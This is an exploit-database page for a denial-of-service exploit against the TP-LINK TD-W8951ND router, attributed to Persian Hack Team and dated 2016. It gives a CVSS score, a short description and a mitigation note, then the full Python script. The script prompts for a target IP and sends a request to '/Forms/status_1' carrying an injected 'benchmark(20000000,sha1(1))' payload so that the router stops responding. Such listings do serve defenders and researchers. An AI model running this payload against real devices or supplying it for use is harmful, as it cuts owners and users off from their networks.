header-logo
Suggest Exploit
vendor:
TD-W8951ND
by:
Persian Hack Team
7.5
CVSS
HIGH
Denial of Service
CWE
Product Name: TD-W8951ND
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: NO
Related CWE:
CPE: h:tp-link:td-w8951nd
Metasploit:
Other Scripts:
Platforms Tested: Windows, Linux
2016

TP-LINK TD-W8951ND – Denial of Service

This exploit allows an attacker to perform a denial of service attack on a TP-LINK TD-W8951ND router. By sending a specially crafted request to the '/Forms/status_1' endpoint, the attacker can cause the router to become unresponsive.

Mitigation:

To mitigate this vulnerability, TP-LINK recommends upgrading to the latest firmware version. Additionally, it is recommended to disable remote management and only allow access from trusted networks.
Source

Exploit-DB raw data:

# Exploit Title: TP-LINK TD-W8951ND - Denial of Service
# Date: 2016-12-07
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM 
# Tested on: Windows AND Linux
# Demo Construction : https://youtu.be/7mv_rW3mtVE

#!/usr/bin/python
import urllib

site=raw_input("Enter IP Address : ")
if (site.find('http://')<0):
    strh = "http://"
    url=strh+site
else:
    url=site

try:
    url += "/Forms/status_1?flagFresh=0&1 and benchmark(20000000%2csha1(1))--=1"
    r = urllib.urlopen(url)
    print r.code
    print "Done!!"
except:
    pass

Navigation

Suggest Exploit

Services By CQR